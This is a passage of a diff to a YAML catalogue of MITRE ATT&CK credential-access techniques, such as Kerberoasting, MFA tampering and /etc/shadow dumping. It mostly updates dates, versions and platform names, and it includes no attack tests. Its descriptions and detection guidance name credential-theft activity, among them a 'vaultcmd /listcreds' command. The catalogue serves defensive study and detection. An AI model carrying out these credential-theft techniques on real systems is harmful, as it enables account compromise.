       - Diogo Fernandes
       - Anastasios Pingios
@@ -46605,18 +47351,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'User Account: User Account Authentication'
@@ -46635,14 +47381,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.004
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -46671,24 +47414,26 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -46723,13 +47468,10 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1187:
     technique:
-      modified: '2023-08-14T19:30:45.123Z'
+      modified: '2024-10-15T16:33:34.508Z'
       name: Forced Authentication
       description: |-
         Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -46807,14 +47549,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Server_Message_Block
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1187
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -46830,6 +47571,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -46838,13 +47580,13 @@ credential-access:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -46852,15 +47594,11 @@ credential-access:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -46871,9 +47609,8 @@ credential-access:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -46919,7 +47656,7 @@ credential-access:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -46938,17 +47675,16 @@ credential-access:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -46981,10 +47717,9 @@ credential-access:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -47021,11 +47756,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.006:
     technique:
-      modified: '2023-09-30T20:24:19.357Z'
+      modified: '2024-10-15T14:20:16.722Z'
       name: Cloud Secrets Management Stores
       description: "Adversaries may acquire credentials from cloud-native secret management
         solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47093,34 +47827,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.008:
     technique:
-      x_mitre_platforms:
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
-      type: attack-pattern
-      created: '2020-02-11T18:46:56.263Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - url: https://attack.mitre.org/techniques/T1003/008
-        external_id: T1003.008
-        source_name: mitre-attack
-      - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
-          File Formats. Retrieved February 19, 2020.
-        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
-        source_name: Linux Password and Shadow File Formats
-      - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
-          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
-          2020.'
-        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-        source_name: nixCraft - John the Ripper
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-25T20:48:04.491Z'
       name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
       description: |
         Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47129,20 +47839,42 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
         distributions, can be used to watch for hostile processes attempting to access
         <code>/etc/passwd</code> and <code>/etc/shadow</code>, alerting on the pid,
         process name, and arguments of such programs.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+      created: '2020-02-11T18:46:56.263Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/008
+        external_id: T1003.008
+      - source_name: Linux Password and Shadow File Formats
+        description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+          File Formats. Retrieved February 19, 2020.
+        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+      - source_name: nixCraft - John the Ripper
+        description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+          2020.'
+        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.008
     atomic_tests: []
   T1558.002:
@@ -47174,7 +47906,7 @@ credential-access:
           from Memory. Retrieved October 11, 2019.
         url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
         source_name: Medium Detecting Attempts to Steal Passwords from Memory
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T21:46:46.831Z'
       name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
       description: |-
         Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -47200,13 +47932,11 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.002
     atomic_tests: []
   T1555.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:44:35.906Z'
       name: 'Credentials from Password Stores: Windows Credential Manager'
       description: |-
         Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -47223,24 +47953,24 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Bernaldo Penas Antelo
+      - Mugdha Peter Bansode
+      - Uriel Kosayev
+      - Vadim Khrykov
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)
 
         Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
 
         Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Bernaldo Penas Antelo
-      - Mugdha Peter Bansode
-      - Uriel Kosayev
-      - Vadim Khrykov
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -47281,36 +48011,13 @@ credential-access:
         url: https://www.passcape.com/windows_password_recovery_vault_explorer
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.004
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -47331,6 +48038,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -47345,52 +48053,42 @@ credential-access:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -47412,6 +48110,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -47422,23 +48121,50 @@ credential-access:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1111:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:37:20.612Z'
       name: Multi-Factor Authentication Interception
       description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
         (i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -47509,9 +48235,8 @@ credential-access:
         url: https://sec.okta.com/scatterswine
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.003:
     technique:
@@ -47570,12 +48295,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.003
     atomic_tests: []
   T1558.003:
     technique:
-      modified: '2023-03-30T21:01:46.538Z'
+      modified: '2024-09-23T22:20:10.994Z'
       name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
       description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
         (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -47607,6 +48331,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -47616,7 +48341,6 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -47628,111 +48352,49 @@ credential-access:
       id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
       created: '2020-02-11T18:43:38.588Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1558/003
         external_id: T1558.003
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
       - source_name: Empire InvokeKerberoast Oct 2016
         description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
           March 22, 2018.
         url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
           Domain. Retrieved March 22, 2018.
         url: https://adsecurity.org/?p=2293
-      - source_name: Microsoft Detecting Kerberoasting Feb 2018
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Microsoft SPN
-        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
-          2018.
-        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Microsoft SetSPN
         description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
           Syntax (Setspn.exe). Retrieved March 22, 2018.
         url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
-      - source_name: SANS Attacking Kerberos Nov 2014
-        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        url: https://redsiege.com/kerberoast-slides
+      - source_name: Microsoft SPN
+        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+          2018.
+        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Harmj0y Kerberoast Nov 2016
         description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
-          Retrieved March 23, 2018.
-        url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+          Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.003
     atomic_tests: []
   T1003.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ExtraHop
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
-      type: attack-pattern
-      created: '2020-02-11T18:45:34.293Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.006
-        url: https://attack.mitre.org/techniques/T1003/006
-      - url: https://msdn.microsoft.com/library/cc228086.aspx
-        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
-          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
-        source_name: Microsoft DRSR Dec 2017
-      - url: https://msdn.microsoft.com/library/dd207691.aspx
-        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
-          4, 2017.
-        source_name: Microsoft GetNCCChanges
-      - url: https://wiki.samba.org/index.php/DRSUAPI
-        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
-        source_name: Samba DRSUAPI
-      - url: https://source.winehq.org/WineAPI/samlib.html
-        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
-        source_name: Wine API samlib.dll
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved August 7, 2017.
-        source_name: ADSecurity Mimikatz DCSync
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved August 7, 2017.
-        source_name: Harmj0y Mimikatz and DCSync
-      - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
